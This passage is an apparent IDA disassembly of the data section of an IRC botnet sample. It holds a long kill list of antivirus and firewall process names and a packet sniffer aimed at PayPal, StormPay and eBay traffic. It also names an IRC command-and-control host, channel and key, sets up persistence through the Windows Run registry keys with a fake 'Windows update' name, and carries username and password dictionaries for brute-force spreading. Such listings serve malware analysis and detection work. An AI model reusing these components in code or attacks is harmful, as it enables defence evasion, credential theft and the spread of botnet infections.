align 4
aStcloader_exe db 'STCLOADER.EXE',0 ; DATA XREF: .data:0043BAD0�o
align 4
aSupftrl_exe db 'SUPFTRL.EXE',0 ; DATA XREF: .data:0043BAD4�o
aSupport_exe db 'SUPPORT.EXE',0 ; DATA XREF: .data:0043BAD8�o
aSupporter5_exe db 'SUPPORTER5.EXE',0 ; DATA XREF: .data:0043BADC�o
align 4
aSvc_exe db 'SVC.EXE',0 ; DATA XREF: .data:0043BAE0�o
aSvchostc_exe db 'SVCHOSTC.EXE',0 ; DATA XREF: .data:0043BAE4�o
align 4
aSvchosts_exe db 'SVCHOSTS.EXE',0 ; DATA XREF: .data:0043BAE8�o
align 4
aSvshost_exe db 'SVSHOST.EXE',0 ; DATA XREF: .data:0043BAEC�o
aSweep95_exe db 'SWEEP95.EXE',0 ; DATA XREF: .data:0043BAF0�o
aSweepnet_sweep db 'SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE',0 ; DATA XREF: .data:0043BAF4�o
align 10h
aSymproxysvc_ex db 'SYMPROXYSVC.EXE',0 ; DATA XREF: .data:0043BAF8�o
aSymtray_exe db 'SYMTRAY.EXE',0 ; DATA XREF: .data:0043BAFC�o
aSysedit_exe db 'SYSEDIT.EXE',0 ; DATA XREF: .data:0043BB00�o
aSystem_exe db 'SYSTEM.EXE',0 ; DATA XREF: .data:0043BB04�o
align 4
aSystem32_exe db 'SYSTEM32.EXE',0 ; DATA XREF: .data:0043BB08�o
align 4
aSysupd_exe db 'SYSUPD.EXE',0 ; DATA XREF: .data:0043BB0C�o
align 10h
aTaskmg_exe db 'TASKMG.EXE',0 ; DATA XREF: .data:0043BB10�o
align 4
aTaskmo_exe db 'TASKMO.EXE',0 ; DATA XREF: .data:0043BB14�o
align 4
aTaskmon_exe db 'TASKMON.EXE',0 ; DATA XREF: .data:0043BB18�o
aTaumon_exe db 'TAUMON.EXE',0 ; DATA XREF: .data:0043BB1C�o
align 10h
aTbscan_exe db 'TBSCAN.EXE',0 ; DATA XREF: .data:0043BB20�o
align 4
aTc_exe db 'TC.EXE',0 ; DATA XREF: .data:0043BB24�o
align 4
aTca_exe db 'TCA.EXE',0 ; DATA XREF: .data:0043BB28�o
aTcm_exe db 'TCM.EXE',0 ; DATA XREF: .data:0043BB2C�o
aTds3_exe db 'TDS-3.EXE',0 ; DATA XREF: .data:0043BB30�o
align 10h
aTds298_exe db 'TDS2-98.EXE',0 ; DATA XREF: .data:0043BB34�o
aTds2Nt_exe db 'TDS2-NT.EXE',0 ; DATA XREF: .data:0043BB38�o
aTeekids_exe db 'TEEKIDS.EXE',0 ; DATA XREF: .data:0043BB3C�o
aTfak_exe db 'TFAK.EXE',0 ; DATA XREF: .data:0043BB40�o
align 10h
aTfak5_exe db 'TFAK5.EXE',0 ; DATA XREF: .data:0043BB44�o
align 4
aTgbob_exe db 'TGBOB.EXE',0 ; DATA XREF: .data:0043BB48�o
align 4
aTitanin_exe db 'TITANIN.EXE',0 ; DATA XREF: .data:0043BB4C�o
aTitaninxp_exe db 'TITANINXP.EXE',0 ; DATA XREF: .data:0043BB50�o
align 4
aTracert_exe db 'TRACERT.EXE',0 ; DATA XREF: .data:0043BB54�o
aTrickler_exe db 'TRICKLER.EXE',0 ; DATA XREF: .data:0043BB58�o
align 10h
aTrjscan_exe db 'TRJSCAN.EXE',0 ; DATA XREF: .data:0043BB5C�o
aTrjsetup_exe db 'TRJSETUP.EXE',0 ; DATA XREF: .data:0043BB60�o
align 4
aTrojantrap3_ex db 'TROJANTRAP3.EXE',0 ; DATA XREF: .data:0043BB64�o
aTsadbot_exe db 'TSADBOT.EXE',0 ; DATA XREF: .data:0043BB68�o
aTvmd_exe db 'TVMD.EXE',0 ; DATA XREF: .data:0043BB6C�o
align 4
aTvtmd_exe db 'TVTMD.EXE',0 ; DATA XREF: .data:0043BB70�o
align 10h
aUndoboot_exe db 'UNDOBOOT.EXE',0 ; DATA XREF: .data:0043BB74�o
align 10h
aUpdat_exe db 'UPDAT.EXE',0 ; DATA XREF: .data:0043BB78�o
align 4
aUpdate_exe db 'UPDATE.EXE',0 ; DATA XREF: .data:0043BB7C�o
align 4
aUpdate_exe_0 db 'UPDATE.EXE',0 ; DATA XREF: .data:0043BB80�o
align 4
aUpgrad_exe db 'UPGRAD.EXE',0 ; DATA XREF: .data:0043BB84�o
align 10h
aUtpost_exe db 'UTPOST.EXE',0 ; DATA XREF: .data:0043BB88�o
align 4
aVbcmserv_exe db 'VBCMSERV.EXE',0 ; DATA XREF: .data:0043BB8C�o
align 4
aVbcons_exe db 'VBCONS.EXE',0 ; DATA XREF: .data:0043BB90�o
align 4
aVbust_exe db 'VBUST.EXE',0 ; DATA XREF: .data:0043BB94�o
align 4
aVbwin9x_exe db 'VBWIN9X.EXE',0 ; DATA XREF: .data:0043BB98�o
aVbwinntw_exe db 'VBWINNTW.EXE',0 ; DATA XREF: .data:0043BB9C�o
align 10h
aVcsetup_exe db 'VCSETUP.EXE',0 ; DATA XREF: .data:0043BBA0�o
aVet32_exe db 'VET32.EXE',0 ; DATA XREF: .data:0043BBA4�o
align 4
aVet95_exe db 'VET95.EXE',0 ; DATA XREF: .data:0043BBA8�o
align 4
aVettray_exe db 'VETTRAY.EXE',0 ; DATA XREF: .data:0043BBAC�o
aVfsetup_exe db 'VFSETUP.EXE',0 ; DATA XREF: .data:0043BBB0�o
aVirHelp_exe db 'VIR-HELP.EXE',0 ; DATA XREF: .data:0043BBB4�o
align 4
aVirusmdpersona db 'VIRUSMDPERSONALFIREWALL.EXE',0 ; DATA XREF: .data:0043BBB8�o
aVnlan300_exe db 'VNLAN300.EXE',0 ; DATA XREF: .data:0043BBBC�o
align 4
aVnpc3000_exe db 'VNPC3000.EXE',0 ; DATA XREF: .data:0043BBC0�o
align 4
aVpc32_exe db 'VPC32.EXE',0 ; DATA XREF: .data:0043BBC4�o
align 4
aVpc42_exe db 'VPC42.EXE',0 ; DATA XREF: .data:0043BBC8�o
align 10h
aVpfw30s_exe db 'VPFW30S.EXE',0 ; DATA XREF: .data:0043BBCC�o
aVptray_exe db 'VPTRAY.EXE',0 ; DATA XREF: .data:0043BBD0�o
align 4
aVscan40_exe db 'VSCAN40.EXE',0 ; DATA XREF: .data:0043BBD4�o
aVscenu6_02d30_ db 'VSCENU6.02D30.EXE',0 ; DATA XREF: .data:0043BBD8�o
align 4
aVsched_exe db 'VSCHED.EXE',0 ; DATA XREF: .data:0043BBDC�o
align 4
aVsecomr_exe db 'VSECOMR.EXE',0 ; DATA XREF: .data:0043BBE0�o
aVshwin32_exe db 'VSHWIN32.EXE',0 ; DATA XREF: .data:0043BBE4�o
align 10h
aVsisetup_exe db 'VSISETUP.EXE',0 ; DATA XREF: .data:0043BBE8�o
align 10h
aVsmain_exe db 'VSMAIN.EXE',0 ; DATA XREF: .data:0043BBEC�o
align 4
aVsmon_exe db 'VSMON.EXE',0 ; DATA XREF: .data:0043BBF0�o
align 4
aVsstat_exe db 'VSSTAT.EXE',0 ; DATA XREF: .data:0043BBF4�o
align 4
aVswin9xe_exe db 'VSWIN9XE.EXE',0 ; DATA XREF: .data:0043BBF8�o
align 4
aVswinntse_exe db 'VSWINNTSE.EXE',0 ; DATA XREF: .data:0043BBFC�o
align 4
aVswinperse_exe db 'VSWINPERSE.EXE',0 ; DATA XREF: .data:0043BC00�o
align 4
aW32dsm89_exe db 'W32DSM89.EXE',0 ; DATA XREF: .data:0043BC04�o
align 4
aW9x_exe db 'W9X.EXE',0 ; DATA XREF: .data:0043BC08�o
aWatchdog_exe db 'WATCHDOG.EXE',0 ; DATA XREF: .data:0043BC0C�o
align 4
aWebdav_exe db 'WEBDAV.EXE',0 ; DATA XREF: .data:0043BC10�o
align 4
aWebscanx_exe db 'WEBSCANX.EXE',0 ; DATA XREF: .data:0043BC14�o
align 4
aWebtrap_exe db 'WEBTRAP.EXE',0 ; DATA XREF: .data:0043BC18�o
aWfindv32_exe db 'WFINDV32.EXE',0 ; DATA XREF: .data:0043BC1C�o
align 4
aWgfe95_exe db 'WGFE95.EXE',0 ; DATA XREF: .data:0043BC20�o
align 10h
aWhoswatchingme db 'WHOSWATCHINGME.EXE',0 ; DATA XREF: .data:0043BC24�o
align 4
aWimmun32_exe db 'WIMMUN32.EXE',0 ; DATA XREF: .data:0043BC28�o
align 4
aWinBugsfix_exe db 'WIN-BUGSFIX.EXE',0 ; DATA XREF: .data:0043BC2C�o
aWin32_exe db 'WIN32.EXE',0 ; DATA XREF: .data:0043BC30�o
align 10h
aWin32us_exe db 'WIN32US.EXE',0 ; DATA XREF: .data:0043BC34�o
aWinactive_exe db 'WINACTIVE.EXE',0 ; DATA XREF: .data:0043BC38�o
align 4
aWindow_exe db 'WINDOW.EXE',0 ; DATA XREF: .data:0043BC3C�o
align 4
aWindows_exe db 'WINDOWS.EXE',0 ; DATA XREF: .data:0043BC40�o
aWininetd_exe db 'WININETD.EXE',0 ; DATA XREF: .data:0043BC44�o
align 4
aWininit_exe db 'WININIT.EXE',0 ; DATA XREF: .data:0043BC48�o
aWininitx_exe db 'WININITX.EXE',0 ; DATA XREF: .data:0043BC4C�o
align 10h
aWinlogin_exe db 'WINLOGIN.EXE',0 ; DATA XREF: .data:0043BC50�o
align 10h
aWinmain_exe db 'WINMAIN.EXE',0 ; DATA XREF: .data:0043BC54�o
aWinnet_exe db 'WINNET.EXE',0 ; DATA XREF: .data:0043BC58�o
align 4
aWinppr32_exe db 'WINPPR32.EXE',0 ; DATA XREF: .data:0043BC5C�o
align 4
aWinrecon_exe db 'WINRECON.EXE',0 ; DATA XREF: .data:0043BC60�o
align 4
aWinservn_exe db 'WINSERVN.EXE',0 ; DATA XREF: .data:0043BC64�o
align 4
aWinssk32_exe db 'WINSSK32.EXE',0 ; DATA XREF: .data:0043BC68�o
align 4
aWinstart_exe db 'WINSTART.EXE',0 ; DATA XREF: .data:0043BC6C�o
align 4
aWinstart001_ex db 'WINSTART001.EXE',0 ; DATA XREF: .data:0043BC70�o
aWintsk32_exe db 'WINTSK32.EXE',0 ; DATA XREF: .data:0043BC74�o
align 4
aWinupdate_exe db 'WINUPDATE.EXE',0 ; DATA XREF: .data:0043BC78�o
align 4
aWkufind_exe db 'WKUFIND.EXE',0 ; DATA XREF: .data:0043BC7C�o
aWnad_exe db 'WNAD.EXE',0 ; DATA XREF: .data:0043BC80�o
align 10h
aWnt_exe db 'WNT.EXE',0 ; DATA XREF: .data:0043BC84�o
aWradmin_exe db 'WRADMIN.EXE',0 ; DATA XREF: .data:0043BC88�o
aWrctrl_exe db 'WRCTRL.EXE',0 ; DATA XREF: .data:0043BC8C�o
align 10h
aWsbgate_exe db 'WSBGATE.EXE',0 ; DATA XREF: .data:0043BC90�o
aWupdater_exe db 'WUPDATER.EXE',0 ; DATA XREF: .data:0043BC94�o
align 4
aWupdt_exe db 'WUPDT.EXE',0 ; DATA XREF: .data:0043BC98�o
align 4
aWyvernworksfir db 'WYVERNWORKSFIREWALL.EXE',0 ; DATA XREF: .data:0043BC9C�o
aXpf202en_exe db 'XPF202EN.EXE',0 ; DATA XREF: .data:0043BCA0�o
align 10h
aZapro_exe db 'ZAPRO.EXE',0 ; DATA XREF: .data:0043BCA4�o
align 4
aZapsetup3001_e db 'ZAPSETUP3001.EXE',0 ; DATA XREF: .data:0043BCA8�o
align 10h
aZatutor_exe db 'ZATUTOR.EXE',0 ; DATA XREF: .data:0043BCAC�o
aZonalm2601_exe db 'ZONALM2601.EXE',0 ; DATA XREF: .data:0043BCB0�o
align 4
aZonealarm_exe db 'ZONEALARM.EXE',0 ; DATA XREF: .data:0043BCB4�o
align 4
a_avp32_exe db '_AVP32.EXE',0 ; DATA XREF: .data:0043BCB8�o
align 4
a_avpcc_exe db '_AVPCC.EXE',0 ; DATA XREF: .data:0043BCBC�o
align 4
a_avpm_exe db '_AVPM.EXE',0 ; DATA XREF: .data:0043BCC0�o
align 10h
aHijackthis_exe db 'HIJACKTHIS.EXE',0 ; DATA XREF: .data:0043BCC4�o
align 10h
aFAgobot_exe db 'F-AGOBOT.EXE',0 ; DATA XREF: .data:0043BCC8�o
align 10h
aPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: .data:0043BCCC�o
align 4
aSysinfo_exe db 'sysinfo.exe',0 ; DATA XREF: .data:0043BCD0�o
aMscvb32_exe db 'mscvb32.exe',0 ; DATA XREF: .data:0043BCD4�o
aPenis32_exe db 'Penis32.exe',0 ; DATA XREF: .data:0043BCD8�o
aBbeagle_exe db 'bbeagle.exe',0 ; DATA XREF: .data:0043BCDC�o
aSysmonxp_exe db 'SysMonXP.exe',0 ; DATA XREF: .data:0043BCE0�o
align 4
aWinupd_exe db 'winupd.exe',0 ; DATA XREF: .data:0043BCE4�o
align 10h
aWinsys_exe db 'winsys.exe',0 ; DATA XREF: .data:0043BCE8�o
align 4
aSsate_exe db 'ssate.exe',0 ; DATA XREF: .data:0043BCEC�o
align 4
aRate_exe db 'rate.exe',0 ; DATA XREF: .data:0043BCF0�o
align 4
aD3dupdate_exe db 'd3dupdate.exe',0 ; DATA XREF: .data:0043BCF4�o
align 4
aIrun4_exe db 'irun4.exe',0 ; DATA XREF: .data:0043BCF8�o
align 10h
aI11r54n4_exe db 'i11r54n4.exe',0 ; DATA XREF: .data:0043BCFC�o
align 10h
aSedebugprivi_1 db 'SeDebugPrivilege',0 ; DATA XREF: sub_40B4F2+5A�o
align 4
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_40B4F2+17D�o
align 10h
aSD_1 db ' %s (%d)',0 ; DATA XREF: sub_40B4F2+18B�o
align 4
aSD_2 db ' %s (%d)',0 ; DATA XREF: sub_40B4F2+19F�o
align 4
aSedebugprivi_2 db 'SeDebugPrivilege',0 ; DATA XREF: sub_40B4F2+207�o
align 4
aProcListingPro db '[PROC]: Listing processes:',0 ; DATA XREF: sub_40B735+19�o
align 4
aProcProcessLis db '[PROC]: Process list completed.',0 ; DATA XREF: sub_40B735+80�o
aProcProcessL_0 db '[PROC]: Process list failed.',0 ; DATA XREF: sub_40B735:loc_40B7BC�o
align 4
off_43DF88 dd offset off_43E080 ; DATA XREF: sub_40B86A+29E�r
dd offset aHttp_0 ; "HTTP"
aStormpay_com db 'stormpay.com',0 ; DATA XREF: sub_40B86A+1DE�o
align 10h
dd 0
dword_43DFA4 dd 3 ; DATA XREF: sub_40B86A+297�r
aStormpay_com_0 db 'STORMPAY.COM',0
align 4
dd 0
dd 3, 79616265h, 6D6F632Eh, 3 dup(0)
dd 3, 59414245h, 4D4F432Eh, 3 dup(0)
dd 3, 70796170h, 6C61h, 3 dup(0)
dd 3, 50594150h, 4C41h, 3 dup(0)
dd 3, 70796170h, 632E6C61h, 6D6Fh, 2 dup(0)
dd 3, 50594150h, 432E4C41h, 4D4Fh, 2 dup(0)
dd 3, 2D746553h, 6B6F6F43h, 3A6569h, 2 dup(0)
dd 3, 6 dup(0)
off_43E080 dd offset byte_435249 ; DATA XREF: .data:off_43DF88�o
aHttp_0 db 'HTTP',0 ; DATA XREF: .data:0043DF8C�o
align 4
aPsniffErrorSoc db '[PSNIFF]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_40B86A+85�o
align 10h
aPsniffErrorBin db '[PSNIFF]: Error: bind() failed, returned: <%d>.',0
; DATA XREF: sub_40B86A+103�o
aPsniffErrorWsa db '[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.',0
; DATA XREF: sub_40B86A+186�o
aPsniffErrorRec db '[PSNIFF]: Error: recv() failed, returned: <%d>',0
; DATA XREF: sub_40B86A+2FC�o
align 4
aPsniff db '[PSNIFF]',0 ; DATA XREF: sub_40B86A+235�o
align 10h
aPsniffSuspicio db '[PSNIFF]: Suspicious %s packet from: %s:%d - %s.',0
; DATA XREF: sub_40B86A+2AB�o
align 4
dword_43E194 dd 1B9h ; DATA XREF: sub_40BBCB+519�r
; sub_40BBCB+5CC�r
dword_43E198 dd 346h ; DATA XREF: sub_40BBCB+618�r
dword_43E19C dd 1F41h ; DATA XREF: sub_40C50A:loc_4122D4�r
dword_43E1A0 dd 45h ; DATA XREF: sub_402994+3B�r
; sub_40C50A+52E7�r
dword_43E1A4 dd 50h ; DATA XREF: sub_402994:loc_402C43�r
; sub_40C50A:loc_4118E3�r
dword_43E1A8 dd 201h ; DATA XREF: sub_40C50A:loc_411A59�r
dword_43E1AC dd 1 ; DATA XREF: sub_40C50A+638�r
dword_43E1B0 dd 1 ; DATA XREF: sub_40BBCB+13D�r
dword_43E1B4 dd 1 ; DATA XREF: sub_409D2E+C�r
; sub_40BBCB:loc_40BF0C�r
byte_43E1B8 db 7Ah ; DATA XREF: sub_405576:loc_405582�r
; sub_40C50A+A7B�r ...
align 4
dword_43E1BC dd 5 ; DATA XREF: sub_413532+2B�r
; sub_413532+51�r ...
dword_43E1C0 dd 1 ; DATA XREF: sub_40C22A+78�r
; sub_40C50A+273�r ...
dword_43E1C4 dd 1 ; DATA XREF: sub_40C22A+72�r
; sub_40C50A+26D�r
aFenr db 'FEnR',0 ; DATA XREF: sub_40BBCB+5D�o
; sub_40C50A+3E40�o ...
align 10h
aFenr_0 db 'FEnR',0 ; DATA XREF: sub_40C50A:loc_4124E4�o
align 4
a19736666386888 db '19736666386888',0 ; DATA XREF: sub_40C50A+6185�o
; sub_40C50A+6254�o
align 4
aFf_arabHacker_ db 'ff.arab-hacker.org',0 ; DATA XREF: sub_40BBCB+504�o
; sub_40BBCB+5BD�o
align 4
aFf db '#ff',0 ; DATA XREF: sub_40BBCB+525�o
; sub_40BBCB+5D3�o
aFuckoff db 'fuckoff',0 ; DATA XREF: sub_40BBCB+53C�o
; sub_40BBCB+5E5�o
aAmngesiyko_exe db 'amngesiyko.exe',0 ; DATA XREF: sub_40119E+F�o
; .text:00401805�o ...
align 4
aMscobngins_dat db 'mscobngins.dat',0 ; DATA XREF: sub_4084C8+3D�o
align 4
aWindowsUpdate5 db 'Windows update 55',0 ; DATA XREF: sub_4038C0+E�o
align 4
aFf_2 db '[FF]-',0 ; DATA XREF: sub_413532+12�o
align 4
aPay0load db 'pay0load',0
align 10h
asc_43E250 db '+x',0 ; DATA XREF: sub_40C50A+62D4�o
align 4
aFf_1 db '#ff-',0 ; DATA XREF: sub_40C50A:loc_40F797�o
; sub_40C50A+50A6�o ...
align 4
aFfkey db '#ffKey',0 ; DATA XREF: sub_40C50A+1EC0�o
align 4
aFa db '#fa',0 ; DATA XREF: sub_40C50A+1C36�o
off_43E268 dd offset a@fofo ; DATA XREF: sub_40C50A:loc_4126D9�o
; "*@fofo"
off_43E26C dd offset aMircV6_12Khale ; DATA XREF: sub_40C50A+8A0�r
; sub_40C50A+61EB�o
; "mIRC v6.12 Khaled Mardam-Bey"
dd offset aMircV6_03Khale ; "mIRC v6.03 Khaled Mardam-Bey"
dd offset aMirc32V5_82K_m ; "mIRC32 v5.82 K.Mardam-Bey"
dd offset aMirc32V6_01K_m ; "mIRC32 v6.01 K.Mardam-Bey"
dd offset aMirc32V6_03K_m ; "mIRC32 v6.03 K.Mardam-Bey"
dd offset aMirc32V6_12K_m ; "mIRC32 v6.12 K.Mardam-Bey"
dd offset aMircV5_71K_mar ; "mIRC v5.71 K.Mardam-Bey"
dd offset aMircV5_82K_mar ; "mIRC v5.82 K.Mardam-Bey"
dd offset aMircV6_01K_mar ; "mIRC v6.01 K.Mardam-Bey"
dd offset aMircV6_03K_mar ; "mIRC v6.03 K.Mardam-Bey"
aSoftwareMicr_1 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
align 4
aSoftwareMicr_2 db 'Software\Microsoft\Windows\CurrentVersion\RunServices',0
align 4
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_413B31+28�o
; sub_413E55+28�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_413B31+D4�o
; sub_413E55+D4�o
align 4
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aStaff ; "staff"
dd offset aRoot ; "root"
dd offset aComputer ; "computer"
dd offset aOwner ; "owner"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aWwwadmin ; "wwwadmin"
dd offset aGuest_0 ; "guest"
dd offset aDefault ; "default"
dd offset aDatabase ; "database"
dd offset aDba ; "dba"
dd offset aOracle ; "oracle"
dd offset aDb2 ; "db2"
dd 0
dd offset dword_491D70
dd offset aAdministrato_1 ; "administrator"
dd offset aAdministrado_0 ; "administrador"
dd offset aAdministrate_0 ; "administrateur"
dd offset aAdministrat_0 ; "administrat"
dd offset aAdmins_0 ; "admins"
dd offset aAdmin_0 ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass_0 ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003_0 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest_1 ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault_0 ; "default"
dd offset aSystem ; "system"
dd offset aServer_4 ; "server"
dd offset aRoot_0 ; "root"
dd offset aNull_1 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser_3 ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter_0 ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob_0 ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase_0 ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2_0 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle_0 ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp_1 ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan_0 ; "lan"
dd offset aInternet_0 ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent_0 ; "student"
dd offset aTeacher_0 ; "teacher"
dd offset aStaff_0 ; "staff"
dd 0
dword_43E5BC dd 10h ; DATA XREF: sub_4034E9+72�w
; sub_40C50A+AE5�r ...
a@fofo db '*@fofo',0 ; DATA XREF: .data:off_43E268�o
align 4
aMircV6_12Khale db 'mIRC v6.12 Khaled Mardam-Bey',0 ; DATA XREF: .data:off_43E26C�o
align 4
aMircV6_03Khale db 'mIRC v6.03 Khaled Mardam-Bey',0 ; DATA XREF: .data:0043E270�o
align 4
aMirc32V5_82K_m db 'mIRC32 v5.82 K.Mardam-Bey',0 ; DATA XREF: .data:0043E274�o
align 4
aMirc32V6_01K_m db 'mIRC32 v6.01 K.Mardam-Bey',0 ; DATA XREF: .data:0043E278�o
align 10h
aMirc32V6_03K_m db 'mIRC32 v6.03 K.Mardam-Bey',0 ; DATA XREF: .data:0043E27C�o
align 4
aMirc32V6_12K_m db 'mIRC32 v6.12 K.Mardam-Bey',0 ; DATA XREF: .data:0043E280�o
align 4
aMircV5_71K_mar db 'mIRC v5.71 K.Mardam-Bey',0 ; DATA XREF: .data:0043E284�o
aMircV5_82K_mar db 'mIRC v5.82 K.Mardam-Bey',0 ; DATA XREF: .data:0043E288�o
aMircV6_01K_mar db 'mIRC v6.01 K.Mardam-Bey',0 ; DATA XREF: .data:0043E28C�o
aMircV6_03K_mar db 'mIRC v6.03 K.Mardam-Bey',0 ; DATA XREF: .data:0043E290�o
aAdministrato_0 db 'administrator',0 ; DATA XREF: .data:0043E33C�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .data:0043E340�o
align 4
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:0043E344�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .data:0043E348�o
aAdmins db 'admins',0 ; DATA XREF: .data:0043E34C�o
align 4
aAdmin db 'admin',0 ; DATA XREF: .data:0043E350�o
align 4
aStaff db 'staff',0 ; DATA XREF: .data:0043E354�o
align 4
aRoot db 'root',0 ; DATA XREF: .data:0043E358�o
align 4
aComputer db 'computer',0 ; DATA XREF: .data:0043E35C�o
align 10h
aOwner db 'owner',0 ; DATA XREF: .data:0043E360�o
align 4
aStudent db 'student',0 ; DATA XREF: .data:0043E364�o
aTeacher db 'teacher',0 ; DATA XREF: .data:0043E368�o
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .data:0043E36C�o
align 4
aGuest_0 db 'guest',0 ; DATA XREF: .data:0043E370�o
align 4
aDefault db 'default',0 ; DATA XREF: .data:0043E374�o
aDatabase db 'database',0 ; DATA XREF: .data:0043E378�o
align 10h
aDba db 'dba',0 ; DATA XREF: .data:0043E37C�o
aOracle db 'oracle',0 ; DATA XREF: .data:0043E380�o
align 4
aDb2 db 'db2',0 ; DATA XREF: .data:0043E384�o
aAdministrato_1 db 'administrator',0 ; DATA XREF: .data:0043E390�o
align 10h
aAdministrado_0 db 'administrador',0 ; DATA XREF: .data:0043E394�o
align 10h
aAdministrate_0 db 'administrateur',0 ; DATA XREF: .data:0043E398�o
align 10h
aAdministrat_0 db 'administrat',0 ; DATA XREF: .data:0043E39C�o
aAdmins_0 db 'admins',0 ; DATA XREF: .data:0043E3A0�o
align 4
aAdmin_0 db 'admin',0 ; DATA XREF: .data:0043E3A4�o
align 4
aAdm db 'adm',0 ; DATA XREF: .data:0043E3A8�o
aPassword1 db 'password1',0 ; DATA XREF: .data:0043E3AC�o
align 4
aPassword db 'password',0 ; DATA XREF: .data:0043E3B0�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .data:0043E3B4�o
align 10h
aPass1234 db 'pass1234',0 ; DATA XREF: .data:0043E3B8�o
align 4
aPass_0 db 'pass',0 ; DATA XREF: .data:0043E3BC�o
align 4
aPwd db 'pwd',0 ; DATA XREF: .data:0043E3C0�o
a007 db '007',0 ; DATA XREF: .data:0043E3C4�o
a1: ; DATA XREF: .data:0043E3C8�o
unicode 0, <1>,0
a12 db '12',0 ; DATA XREF: .data:0043E3CC�o
align 4
a123 db '123',0 ; DATA XREF: .data:0043E3D0�o
a1234 db '1234',0 ; DATA XREF: .data:0043E3D4�o
align 10h
a12345 db '12345',0 ; DATA XREF: .data:0043E3D8�o
align 4
a123456 db '123456',0 ; DATA XREF: .data:0043E3DC�o
align 10h
a1234567 db '1234567',0 ; DATA XREF: .data:0043E3E0�o
a12345678 db '12345678',0 ; DATA XREF: .data:0043E3E4�o
align 4
a123456789 db '123456789',0 ; DATA XREF: .data:0043E3E8�o
align 10h
a1234567890 db '1234567890',0 ; DATA XREF: .data:0043E3EC�o
align 4
a2000 db '2000',0 ; DATA XREF: .data:0043E3F0�o
align 4
a2001 db '2001',0 ; DATA XREF: .data:0043E3F4�o
align 4
a2002 db '2002',0 ; DATA XREF: .data:0043E3F8�o
align 4
